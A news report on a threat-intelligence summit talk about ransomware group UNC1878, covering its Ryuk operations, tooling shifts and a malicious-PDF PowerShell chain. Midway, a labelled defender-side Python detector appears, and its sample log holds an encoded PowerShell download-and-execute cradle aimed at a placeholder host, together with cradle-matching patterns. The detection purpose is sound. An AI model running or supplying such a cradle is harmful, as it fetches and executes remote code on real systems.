After undergoing a period of silence during the spring last year, the Ryuk ransomware strain reemerged in the fall — just to quiet down again in November.
The perceived silence in November from threat group UNC1878 was veiled by a pivot in activity, according to Aaron Stephens, senior threat analyst at Mandiant, during the SANS Institute Cyber Threat Intelligence Summit Thursday. FireEye's Mandiant uses "UNC" as shorthand for "uncategorized" for tracking similar activity clusters rather than the advanced persistent threat (APT) designation.
Mandiant believes some of the changes were made in reaction to Microsoft disrupting Trickbot's operations in October. While the mission was successful, though admittedly ongoing, it forced Trickbot users to outgrow the botnet and move to Kegtap.
"It was easier to rationalize the switch from Trickbot to Kegtap because of the extended break," said Stephens, referring to UNC1878's months-long hiatus. But then, actors quickly turned away from Kegtap, which "seems odd, especially with all of the success that they had in September and October."
Ransomware groups are resilient because the actors behind them quickly adapt. Their ability to switch means every type of business should remain aware of the leading groups' ever-evolving tactics, techniques and procedures (TTPs).
Simple changes, such as recycling malware or tweaking operations, can change how experts view and defend their organizations.
Companies have to "think about what's happening below the radar. There [are] folks that are hitting you every single day," namely ransomware, said Chris Krebs, former director of the Cybersecurity & Infrastructure Security Agency (CISA), during the summit.
It's not all ransomware
Ransomware actors are becoming more and more savvy, suggesting that no single organization can defend against an attack on its own.
CISA's focus on ransomware was forced because "we're on the verge, as I see it, of a national emergency, if we're not already there," said Krebs. "The death of 1,000 cuts that ransomware actors are lobbing against us" is unrelenting, he said.
On Jan. 21, CISA announced its "Reduce the Risk of Ransomware Campaign," calling on private sector coordination with the federal government for support. The campaign has a "particular focus" on COVID-19 response.
In the ransomware alert issued in late October, CISA warned of Ryuk and Conti strains. However, Mandiant has only observed UNC1878 using Conti in one instance. "Just like with Ryuk, we have to separate the malware from the threat actor," said Stephens.
Threat actors toy with tools, sometimes to test permanent solutions or to use different malware for varying end goals. In the instance UNC1878 used Conti, the group committed data theft and extortion. Historically, UNC1878's mission, while financially motivated, is geared at wreaking chaos for the victim.
UNC1878 prefers deploying Ryuk by "iterating through hosts listed in text files on the shared drive," said Stephens. But UNC1878's toolkit is vast. "We think UNC1878 can best be summarized with two words: speed and scale," he said.
UNC1878 powered more than 90% of Ryuk-related ransomware attacks, according to Mandiant research. But "not every UNC1878 intrusion ends in ransomware. In fact, most don't," said Stephens. Less than 40% of the threat group's intrusions escalated to deploying Ryuk in 2020.
But that doesn't mean the group is giving up on the ransomware strain. In fact, it's improving it.
Since October, UNC1878 shortened its "time to ransomware" from five days and 17 hours to four days and seven hours.
"UNC1878 continues to be a dominant player in the ransomware game, and their operational tempo only appears to be getting faster," said Stephens. "Regardless of what your business does, ransomware is in your threat model."
Ryuk's new moves
While investigating phishing emails in November, Mandiant dove into a malicious PDF file disguised as a customer complaint. It was JavaScript, but "really gross JavaScript too, way grosser than normal," said Stephens. The code ran PowerShell and, after decoding Base64, made a GET request to a URL. "So we're off to get this PHP, and fool me twice, it's PowerShell again," said Stephens.
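As an added, defender-side example (not code from the article or from Mandiant): the chain above hinges on a Base64-encoded PowerShell command, launched from a document reader, that fetches a URL. The Python below decodes the UTF-16LE Base64 payload of `-EncodedCommand` from constructed process-creation log lines and flags a download cradle spawned by a PDF reader; the log line format, the parent process name and the URL are assumptions.

```python
import base64
import re
from typing import Optional

def _enc(cmd: str) -> str:
    """Encode a command the way PowerShell expects -EncodedCommand (UTF-16LE, Base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed sample log lines ("parent -> child command line"); not real telemetry.
SAMPLE_LOGS = [
    "AcroRd32.exe -> powershell.exe -nop -w hidden -EncodedCommand "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/page.php')"),
    "explorer.exe -> powershell.exe -Command Get-Date",
]

# Common download-cradle primitives; any hit plus a URL is treated as suspicious.
CRADLE_PATTERN = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\bIEX\b)",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOCUMENT_READERS = ("acrord32", "winword", "excel")  # assumed parent names to watch

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(logline: str) -> dict:
    """Decode the command line if encoded and flag cradle + URL, noting a document-reader parent."""
    parent, _, cmdline = logline.partition("->")
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    urls = URL_PATTERN.findall(text)
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if CRADLE_PATTERN.search(text) and urls:
        reasons.append("download cradle with URL")
    if parent.strip().lower().split(".")[0] in DOCUMENT_READERS:
        reasons.append("spawned by document reader")
    return {"suspicious": "download cradle with URL" in reasons, "urls": urls, "reasons": reasons}
```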
The delivery method changed, but the progression led researchers back to UNC1878 because the signing certificates on the command and control (C2) infrastructure matched those uncovered in the fall. The group has a "penchant for offensive security frameworks," including PowerShell Empire, Cobalt Strike and Metasploit, said Van Ta, senior threat analyst at Mandiant, during the summit. Cobalt Strike was leveraged in almost 90% of UNC1878 intrusions since 2019.
"We have seen some sort of offensive security tooling in every single UNC1878 intrusion," said Ta. Since October, the group has adopted the Covenant framework. In one case, UNC1878 deviated from typical ploys to rely on a Covenant Grunt Stager following the initial Kegtap infection, and then an interactive redeployment.
The use of Covenant, by any of Mandiant's UNC groups, is approaching "shiny Pokemon levels of rarity," said Ta. As of right now, researchers aren't convinced Covenant is a permanent pivot by UNC1878, as much as it was an experiment.
Another new tool UNC1878 is testing is Grimagent, found in a customer's systems in October. The backdoor uses a combination of asymmetric encryption for the initial beacon and symmetric encryption for the commands in C2 communications.
The investigation of the customer with Grimagent was in response to a UNC1878 Ryuk ransomware attack. "The timeline proximity between UNC1878 and Grimagent on the system was tight, within minutes," said Ta. Additional activity supported UNC1878's historical lifecycle.
The initial detection of Grimagent led researchers to consider that it was related to UNC2053's ecosystem, a group that also uses Kegtap. Reusing certificates across different malware "suggests some sort of relationship between UNC1878 and UNC2053 tooling, and thus, we need to be especially careful with how we assess the samples from an attribution standpoint," said Ta.